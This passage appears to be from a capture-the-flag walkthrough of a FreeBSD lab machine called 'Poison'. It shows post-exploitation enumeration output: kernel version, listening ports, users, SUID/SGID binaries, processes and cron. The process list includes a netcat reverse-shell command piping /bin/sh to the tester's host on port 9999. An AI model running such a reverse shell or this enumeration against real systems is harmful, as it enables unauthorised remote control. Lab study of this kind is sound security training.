Since I was able to skip lateral movement by SSHing directly into the target system as the charix
user, I will proceed with post-exploitation enumeration as that user.
System/Kernel
charix@poison:~ % file /bin/sh ; uname -a ; freebsd-version
/bin/sh: ELF 64-bit LSB executable, x86-64, version 1 (FreeBSD), dynamically linked, interpreter /libexec/ld-elf.so.1, for FreeBSD 11.1, FreeBSD-style, stripped
FreeBSD poison 11.1-RELEASE FreeBSD 11.1-RELEASE #0 r321309: Fri Jul 21 02:08:28 UTC 2017 root@releng2.nyi.freebsd.org:/usr/obj/usr/src/sys/GENERIC amd64
11.1-RELEASE
FreeBSD 11.1-RELEASE
x86-64
Networks
charix@Poison:~ % netstat -anup tcp
Active Internet connections (including servers)
Proto Recv-Q Send-Q Local Address Foreign Address (state)
tcp4 0 0 10.10.10.84.22 10.10.14.10.52802 ESTABLISHED
tcp4 0 0 10.10.10.84.33683 10.10.14.10.9999 ESTABLISHED
tcp4 0 0 10.10.10.84.80 10.10.14.10.44304 ESTABLISHED
tcp4 0 0 127.0.0.1.25 *.* LISTEN
tcp4 0 0 *.80 *.* LISTEN
tcp6 0 0 *.80 *.* LISTEN
tcp4 0 0 *.22 *.* LISTEN
tcp6 0 0 *.22 *.* LISTEN
tcp4 0 0 127.0.0.1.5801 *.* LISTEN
tcp4 0 0 127.0.0.1.5901 *.* LISTEN
charix@Poison:~ % netstat -anup udp
Active Internet connections (including servers)
Proto Recv-Q Send-Q Local Address Foreign Address (state)
udp4 0 0 *.514 *.*
udp6 0 0 *.514 *.*
Listeners bound to loopback only (not reachable from the network directly; 5801/5901 correspond to the root-owned Xvnc :1 display seen in the process list below):
127.0.0.1.25
127.0.0.1.5801
127.0.0.1.5901
Users & Groups
charix@poison:~ % cat /etc/passwd ; ls -lasht /home
# $FreeBSD: releng/11.1/etc/master.passwd 299365 2016-05-10 12:47:36Z bcr $
#
root:*:0:0:Charlie &:/root:/bin/csh
toor:*:0:0:Bourne-again Superuser:/root:
daemon:*:1:1:Owner of many system processes:/root:/usr/sbin/nologin
operator:*:2:5:System &:/:/usr/sbin/nologin
bin:*:3:7:Binaries Commands and Source:/:/usr/sbin/nologin
tty:*:4:65533:Tty Sandbox:/:/usr/sbin/nologin
kmem:*:5:65533:KMem Sandbox:/:/usr/sbin/nologin
games:*:7:13:Games pseudo-user:/:/usr/sbin/nologin
news:*:8:8:News Subsystem:/:/usr/sbin/nologin
man:*:9:9:Mister Man Pages:/usr/share/man:/usr/sbin/nologin
sshd:*:22:22:Secure Shell Daemon:/var/empty:/usr/sbin/nologin
smmsp:*:25:25:Sendmail Submission User:/var/spool/clientmqueue:/usr/sbin/nologin
mailnull:*:26:26:Sendmail Default User:/var/spool/mqueue:/usr/sbin/nologin
bind:*:53:53:Bind Sandbox:/:/usr/sbin/nologin
unbound:*:59:59:Unbound DNS Resolver:/var/unbound:/usr/sbin/nologin
proxy:*:62:62:Packet Filter pseudo-user:/nonexistent:/usr/sbin/nologin
_pflogd:*:64:64:pflogd privsep user:/var/empty:/usr/sbin/nologin
_dhcp:*:65:65:dhcp programs:/var/empty:/usr/sbin/nologin
uucp:*:66:66:UUCP pseudo-user:/var/spool/uucppublic:/usr/local/libexec/uucp/uucico
pop:*:68:6:Post Office Owner:/nonexistent:/usr/sbin/nologin
auditdistd:*:78:77:Auditdistd unprivileged user:/var/empty:/usr/sbin/nologin
www:*:80:80:World Wide Web Owner:/nonexistent:/usr/sbin/nologin
_ypldap:*:160:160:YP LDAP unprivileged user:/var/empty:/usr/sbin/nologin
hast:*:845:845:HAST unprivileged user:/var/empty:/usr/sbin/nologin
nobody:*:65534:65534:Unprivileged user:/nonexistent:/usr/sbin/nologin
_tss:*:601:601:TrouSerS user:/var/empty:/usr/sbin/nologin
messagebus:*:556:556:D-BUS Daemon User:/nonexistent:/usr/sbin/nologin
avahi:*:558:558:Avahi Daemon User:/nonexistent:/usr/sbin/nologin
cups:*:193:193:Cups Owner:/nonexistent:/usr/sbin/nologin
charix:*:1001:1001:charix:/home/charix:/bin/csh
total 12
4 drwxr-xr-x 20 root wheel 1.0k Oct 21 15:13 ..
4 drwxr-x--- 2 charix charix 512B Mar 19 2018 charix
4 drwxr-xr-x 3 root wheel 512B Mar 19 2018 .
SUIDs
charix@Poison:~ % find / -perm -04000 -ls -type f
1291628 56 -r-sr-xr-x 1 root wheel 26736 Jul 21 2017 /usr/sbin/traceroute6
1291650 48 -r-sr-sr-x 2 root authpf 24312 Jul 21 2017 /usr/sbin/authpf-noip
1291723 72 -r-sr-xr-x 1 root wheel 32808 Jul 21 2017 /usr/sbin/traceroute
1291767 48 -r-sr-xr-x 1 root wheel 21512 Jul 21 2017 /usr/sbin/timedc
1291650 48 -r-sr-sr-x 2 root authpf 24312 Jul 21 2017 /usr/sbin/authpf
1291776 960 -r-sr-xr-- 1 root network 433872 Jul 21 2017 /usr/sbin/ppp
1291557 16 -r-sr-xr-- 1 root mail 7424 Jul 21 2017 /usr/libexec/dma-mbox-create
1291579 16 -r-sr-xr-x 1 root wheel 6232 Jul 21 2017 /usr/libexec/ulog-helper
1291584 96 -r-sr-xr-x 1 root wheel 49152 Jul 21 2017 /usr/libexec/ssh-keysign
1291140 72 -r-sr-sr-x 1 root daemon 34368 Jul 21 2017 /usr/bin/lpq
1291148 32 -r-sr-xr-x 1 root wheel 16216 Jul 21 2017 /usr/bin/rlogin
1291200 72 -r-sr-sr-x 1 root daemon 33072 Jul 21 2017 /usr/bin/lprm
1291235 88 -r-sr-sr-x 1 root daemon 41248 Jul 21 2017 /usr/bin/lpr
1291254 64 -r-sr-xr-x 4 root wheel 29016 Jul 21 2017 /usr/bin/at
1291255 72 -r-sr-xr-x 1 root wheel 33288 Jul 21 2017 /usr/bin/crontab
1291254 64 -r-sr-xr-x 4 root wheel 29016 Jul 21 2017 /usr/bin/atrm
1291254 64 -r-sr-xr-x 4 root wheel 29016 Jul 21 2017 /usr/bin/atq
1291311 40 -r-sr-xr-x 1 root wheel 17584 Jul 21 2017 /usr/bin/su
1291316 56 -r-sr-xr-x 1 root wheel 25488 Jul 21 2017 /usr/bin/chpass
1291325 32 -r-sr-xr-x 1 root wheel 16264 Jul 21 2017 /usr/bin/quota
1291337 24 -r-sr-xr-x 1 root wheel 9856 Jul 21 2017 /usr/bin/passwd
1291388 16 -r-sr-xr-x 1 root wheel 7256 Jul 21 2017 /usr/bin/opieinfo
1291394 56 -r-sr-xr-x 1 root wheel 26040 Jul 21 2017 /usr/bin/login
1291254 64 -r-sr-xr-x 4 root wheel 29016 Jul 21 2017 /usr/bin/batch
1291457 32 -r-sr-xr-x 1 root wheel 14304 Jul 21 2017 /usr/bin/opiepasswd
1291470 24 -r-sr-xr-x 1 root wheel 11600 Jul 21 2017 /usr/bin/lock
1291523 24 -r-sr-xr-x 1 root wheel 12192 Jul 21 2017 /usr/bin/rsh
1382703 4352 -r-sr-xr-x 1 root wheel 2191384 Jan 2 2018 /usr/local/bin/Xorg
1469407 104 -rwsr-x--- 1 root messagebus 49416 Jan 2 2018 /usr/local/libexec/dbus-daemon-launch-helper
561818 48 -r-sr-xr-x 1 root wheel 20912 Jul 21 2017 /bin/rcp
722311 80 -r-sr-xr-x 1 root wheel 40752 Jul 21 2017 /sbin/ping6
722342 32 -r-sr-xr-- 2 root operator 15904 Jul 21 2017 /sbin/poweroff
722376 24 -r-sr-xr-- 1 root operator 10600 Jul 21 2017 /sbin/mksnap_ffs
722342 32 -r-sr-xr-- 2 root operator 15904 Jul 21 2017 /sbin/shutdown
722402 64 -r-sr-xr-x 1 root wheel 32488 Jul 21 2017 /sbin/ping
SGIDs
charix@poison:~ % find / -perm -02000 -ls -type f
1291625 24 -r-xr-sr-x 1 root kmem 11800 Jul 21 2017 /usr/sbin/trpt
1291650 48 -r-sr-sr-x 2 root authpf 24312 Jul 21 2017 /usr/sbin/authpf-noip
1291650 48 -r-sr-sr-x 2 root authpf 24312 Jul 21 2017 /usr/sbin/authpf
1291818 120 -r-xr-sr-x 1 root daemon 59800 Jul 21 2017 /usr/sbin/lpc
1369407 1536 -r-xr-sr-x 1 root smmsp 729800 Jul 21 2017 /usr/libexec/sendmail/sendmail
1291586 128 -r-xr-sr-x 1 root mail 63088 Jul 21 2017 /usr/libexec/dma
1291140 72 -r-sr-sr-x 1 root daemon 34368 Jul 21 2017 /usr/bin/lpq
1291200 72 -r-sr-sr-x 1 root daemon 33072 Jul 21 2017 /usr/bin/lprm
1291204 32 -r-xr-sr-x 1 root kmem 13840 Jul 21 2017 /usr/bin/btsockstat
1291235 88 -r-sr-sr-x 1 root daemon 41248 Jul 21 2017 /usr/bin/lpr
1291343 24 -r-xr-sr-x 1 root tty 12280 Jul 21 2017 /usr/bin/write
1291393 304 -r-xr-sr-x 1 root kmem 154448 Jul 21 2017 /usr/bin/netstat
1291416 32 -r-xr-sr-x 1 root tty 15984 Jul 21 2017 /usr/bin/wall
Processes
charix@Poison:~ % ps -aux
USER PID %CPU %MEM VSZ RSS TT STAT STARTED TIME COMMAND
root 11 100.0 0.0 0 16 - RL 15:13 56:41.55 [idle]
root 0 0.0 0.0 0 160 - DLs 15:13 0:00.01 [kernel]
root 1 0.0 0.1 5408 1040 - ILs 15:13 0:00.00 /sbin/init --
[...]
root 319 0.0 0.5 9560 5052 - Ss 15:13 0:00.16 /sbin/devd
root 390 0.0 0.2 10500 2448 - Ss 15:13 0:00.06 /usr/sbin/syslogd -s
root 543 0.0 0.5 56320 5396 - S 15:13 0:02.13 /usr/local/bin/vmtoolsd -c /usr/local/share/vmware-tools/tools.conf -p /usr
root 620 0.0 0.7 57812 7052 - Is 15:13 0:00.00 /usr/sbin/sshd
root 625 0.0 1.1 99172 11516 - Ss 15:14 0:00.10 /usr/local/sbin/httpd -DNOHTTPACCEPT
[...]
root 643 0.0 0.6 20636 6140 - Ss 15:15 0:00.05 sendmail: accepting connections (sendmail)
smmsp 646 0.0 0.6 20636 5808 - Is 15:16 0:00.00 sendmail: Queue runner@00:30:00 for /var/spool/clientmqueue (sendmail)
root 650 0.0 0.2 12592 2436 - Ss 15:16 0:00.01 /usr/sbin/cron -s
www 755 0.0 0.3 13180 2664 - I 15:40 0:00.00 sh -c mkfifo /tmp/ochtcw; nc 10.10.14.10 9999 0</tmp/ochtcw | /bin/sh >/tmp
www 758 0.0 0.3 13180 2672 - I 15:40 0:00.00 /bin/sh
www 764 0.0 0.3 13180 2668 - I 15:42 0:00.00 /bin/sh
root 783 0.0 0.8 85228 7840 - Is 15:51 0:00.02 sshd: charix [priv] (sshd)
charix 786 0.0 0.8 85228 7840 - S 15:52 0:00.11 sshd: charix@pts/1 (sshd)
root 529 0.0 0.9 23620 8868 v0- I 15:13 0:00.03 Xvnc :1 -desktop X -httpd /usr/local/share/tightvnc/classes -auth /root/.Xa
root 540 0.0 0.7 67220 7064 v0- I 15:13 0:00.02 xterm -geometry 80x24+10+10 -ls -title X Desktop
root 541 0.0 0.5 37620 5312 v0- I 15:13 0:00.01 twm
root 697 0.0 0.2 10484 2076 v0 Is+ 15:16 0:00.00 /usr/libexec/getty Pc ttyv0
root 698 0.0 0.2 10484 2076 v1 Is+ 15:16 0:00.00 /usr/libexec/getty Pc ttyv1
root 699 0.0 0.2 10484 2076 v2 Is+ 15:16 0:00.00 /usr/libexec/getty Pc ttyv2
root 700 0.0 0.2 10484 2076 v3 Is+ 15:16 0:00.00 /usr/libexec/getty Pc ttyv3
root 701 0.0 0.2 10484 2076 v4 Is+ 15:16 0:00.00 /usr/libexec/getty Pc ttyv4
root 702 0.0 0.2 10484 2076 v5 Is+ 15:16 0:00.00 /usr/libexec/getty Pc ttyv5
root 703 0.0 0.2 10484 2076 v6 Is+ 15:16 0:00.00 /usr/libexec/getty Pc ttyv6
root 704 0.0 0.2 10484 2076 v7 Is+ 15:16 0:00.00 /usr/libexec/getty Pc ttyv7
root 565 0.0 0.4 19660 3616 0 Is+ 15:13 0:00.01 -csh (csh)
charix 787 0.0 0.4 19660 3828 1 Ss 15:52 0:00.06 -csh (csh)
charix 903 0.0 0.3 21208 2652 1 R+ 16:10 0:00.00 ps -aux
Cron
charix@poison:~ % crontab -l ; cat /etc/crontab
crontab: no crontab for charix
# /etc/crontab - root's crontab for FreeBSD
#
# $FreeBSD: releng/11.1/etc/crontab 194170 2009-06-14 06:37:19Z brian $
#
SHELL=/bin/sh
PATH=/etc:/bin:/sbin:/usr/bin:/usr/sbin
#
#minute hour mday month wday who command
#
*/5 * * * * root /usr/libexec/atrun
#
# Save some entropy so that /dev/random can re-seed on boot.
*/11 * * * * operator /usr/libexec/save-entropy
#
# Rotate log files every hour, if necessary.
0 * * * * root newsyslog
#
# Perform daily/weekly/monthly maintenance.
1 3 * * * root periodic daily
15 4 * * 6 root periodic weekly
30 5 1 * * root periodic monthly
#
# Adjust the time zone if the CMOS clock keeps local time, as opposed to
# UTC time. See adjkerntz(8) for details.
1,31 0-5 * * * root adjkerntz -a
1,31 0-5 * * * root adjkerntz -a